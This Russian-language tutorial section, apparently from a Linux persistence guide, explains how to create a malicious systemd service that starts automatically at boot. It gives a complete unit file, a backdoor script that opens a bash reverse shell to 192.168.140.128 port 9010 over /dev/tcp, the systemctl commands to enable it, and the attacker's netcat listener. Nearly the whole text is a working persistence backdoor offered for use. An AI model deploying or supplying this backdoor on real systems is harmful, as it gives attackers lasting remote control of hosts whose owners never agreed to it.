05 - Systemd

systemd — это система инициализации и менеджер служб в большинстве дистрибутивов Linux. Загружает пользовательское пространство и дальше управляет системными процессами. Значит создав собственную вредоносную службу systemd, мы можем получить бэкдор, который будет запускаться автоматически при запуске ОС. Для этого нам понадобится 2 файла:

1. Файл службы systemD

2. Файл вредоносного скрипта (который отдаст нам revers shell)

// Создаем файл службы /etc/systemd/system/backdoor.service
[Unit]
Description=backdoor service
After=network.target

[Service]
Type=simple
ExecStart=/opt/backdoor.sh
Restart=on-abort

[Install]
WantedBy=multi-user.target

// Создаем файл вредоносного скрипта /opt/backdoor.sh
#!/usr/bin/bash
/bin/bash -i >& /dev/tcp/192.168.140.128/9010 0>&1

// Перезапускаем службы и добавляем наш сервис в автозагрузку
systemctl daemon-reload
systemctl enable backdoor.service
systemctl start backdoor.service

// На хосте атакующего запускам netcat 
nc -lvp 9010

Мы получим шелл после команды systemctl start backdoor.service и каждый раз когда атакуемый хост будет перезагружен.